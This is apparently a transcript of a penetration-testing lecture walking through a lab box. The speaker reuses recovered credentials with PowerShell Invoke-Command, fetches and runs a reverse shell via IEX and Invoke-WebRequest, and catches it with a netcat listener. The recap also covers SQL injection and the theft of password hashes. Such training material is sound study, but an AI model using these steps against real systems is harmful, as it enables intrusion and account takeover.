Okay, so we've got access as the iUser account. If we do dir, you can see these are the files inside of the local web app. What can we do? We need to get Hector. And we can see Hector is actually a member of this remote management users group. And so the next thing we need to do is figure out what is this remote management users group? What can it do? Let's hit up Google and let's see. So remote management users, PowerShell remoting. All right, so PowerShell remoting is basically SSH for Windows. So this user may have the ability to move laterally to other accounts, which is a good thing to know. So let's just go back here and let's think about this. We want to gain access as this particular user, and we actually have creds. We have Hector's creds. At least it looks like Hector's creds, right? This right here. So we might be able to use these creds to log in as Hector, right? All right, so how do we do that? Well, first, we probably should get PowerShell installed on our local box. If you go to PowerShell GitHub, actually PowerShell Linux, installing PowerShell on Linux, you'll see this long post. And if you take this stuff right here, you just click copy. It'll copy all this to the clipboard. Let's clear this. Control AZ, Control Shift V, press enter, and it will try to install PowerShell and actually launch it. There we go. PS version table. We now have PowerShell on our local box. Isn't that sweet? Yeah, PowerShell version 7 is actually cross-platform. It's not just a Windows tool anymore. I don't know if you knew that. A lot of people don't. But with version 6 actually is when they moved over to the .NET Core framework, which is different than .NET, because .NET Core is cross-platform. And version 7 is the latest iteration. It has almost all the functionality of the previous versions and more. More commandlets, more modules, more everything, more awesome. All right, so Control AZ. What are we going to do here? Well, we're going to play. All right, so how do we do this? Well, let's create some variables first. Username equals Hector. Username. Yes, we have Hector. Sweet. Password. What is the password? We need to convert the password to a secure string. So how do we do that? Well, if we do sudo, not sudo, we're in PowerShell, get help, and we can do like secure string. Yes, so we have a commandlet named from secure string and to secure string. We want to do to secure string, right? Convert to secure string details. And I just hit tab to autocomplete that. In fact, if I backspace this out and I just hit tab here, it shows me all of the options I have. And if I just did parameters like this, and then I hit star, it'll just show me all the parameters. So now I know which parameters I need to pass to this tool to convert everything to a secure string. Right, that's what this does. It's going to convert the clear text password into a secure string so we can use it. And we have an as plain text, which specifies a plain text string to convert into a secure string. So we probably want that. And then force, which confirms that you understand the implications of using the as plain text. All right, so let's just do this. And let's go up. Oh, by the way, one of the things you should do is you should actually do update help so that you get the latest help files for PowerShell. And if you don't do this, you'll actually have incomplete help files, and it'll be very difficult and frustrating when you're trying to figure out what's happening. So Control A left bracket, and tells you what this does here. Converts encrypted standard strings into secure strings. It can also convert plain text strings to secure strings, right? So that is precisely what we want to do. So let's go back to where we were before. and we want to use as plain text, right? So let's go over here and let's type, let's say password equals convert to secure string, and let's put the string in there. So Control A, Shift double quote, cat creds. Let's grab this password here. Control Shift C, Control Shift V, put that in single quotes. Control Shift A, close the bottom pane. Hold down Control right arrow to go to the end, and then we want to do as plain text and force. No error messages. So we do password. We've got that. Nice. And we're probably also going to want to do the host name. So we'll save the host name as a variable. Fidelity. All right. So now we've got a secure string. Let's go ahead and build our credential object so we can make use of this string and execute commands as Hector on this local box. So press Q to get out of here. And let's do git help. Git help. PS git. Let's see. Let's just do credential. And you can see there's a git credential commandlet. So if I do git help git credential parameter star, you can see it belongs to this class, the system.management automation.ps credential. So let's create a new object, and we'll name it credential. We'll say new object, system.management.automation.ps credentials. And what we're going to do is we're going to put username and password. That's because I put an S. This should just be credential. Nice. Then we can do credential, and we see we've got this object. Now the last thing we need to do is invoke the command on the local box. So again, git help, invoke command. That did a little bit too much. Let's just do invoke command. Yes. So what this does is it will run a command. It runs a command on a local or remote computer and returns all output from those commands. So we're going to actually run invoke command from the perspective of the victim machine, and therefore it will return the results on the local machine, the victim machine, to us, the attacker. Hope that makes sense. Parameter star. Let's see what parameters we have here. We've got a lot, but we only need a few. So allow redirections, nope, application name, argument list, no. Okay, computer name, so let's put that in there. So we can say invoke command, computer name is host name, get that from here, right? Let's put this parameter in. What else do we need? Page down. Okay. Credential specifies a user account that has permission to perform this action. The default is the current user. So let's go ahead and put this in. Credential. That's the variable for that holds our credential object. And then script block, and this specifies the command to run and close the commands in curly braces. All right, this is exactly what we want, because if we do script block this, we can now put a command in here. And what command do you think we want to put in here? Well, we want to run a command as Hector. What command do you think we would want to run as an attacker as Hector? Think about this for a second. We want to get a new shell, right? So if we run the IEX invoke web request to port 443 again, we will download our shell, but we'll download it in the security context of this credentialed user, which is Hector, which means we should have a shell as Hector. All right, let's try it. So we'll say IEX, invoke expression, and then invoke web request 1410. Invoke PowerShell TCP, use basic parsing. And before we do that, we need to make sure that we're listening on port 443, because remember, this is going to try to connect back on 443. So Control A, Shift :, sudo rl wrap. And by the way, the reason I'm using rl wrap, if you do, rl wrap is a tool that gives us the up-down functionality. So if you do sudo apt cache rl wrap, sudo apt search rl wrap. See, read line feature command line wrapper. This means when we would get our shell back from the Windows box, we'll have the up-down arrows. If we don't pass netcat to rl wrap, we'll lose that, and it gets really frustrating when you're trying to navigate on the box. So we're doing sudo rl wrap netcat. No, don't resolve host names, make it verbose, listen on port 443. All right, and then let's do it, see if it works. All right, and it looks like we forgot this. It actually tells you exactly what we forgot. Missing closing parenthesis, right? We've got the opening parentheses here. We missed the closing one here. So let's just put it in. Sweet. We are now Hector, as you can see from Hector here and from here. So now that we are Hector, we need to find a way to move vertically. So we did horizontal escalation, privileged escalation, and now we're going to move into the vertical escalation. Now remember how we did the horizontal escalation? We found clear text credentials inside the database. And of course, the credentials they were hashed, but we were able to obtain those credentials by exploiting a publicly facing web application, which is this fidelity application. There's SQL injection inside of one of the parameters, actually multiple parameters, but in this case inside of their catalog database. And we were able to exfil the MySQL.users table, which contained those hashes. And now if they salted the hashes, it might make it a little bit difficult to crack. They weren't salted either. So just wanted to get you up to speed on what we did and what we're doing. And this is typically what you would do when you're typing up a report for a pen test. All right, so in the next lecture, we are going to escalate from Hector to system. I will see you then.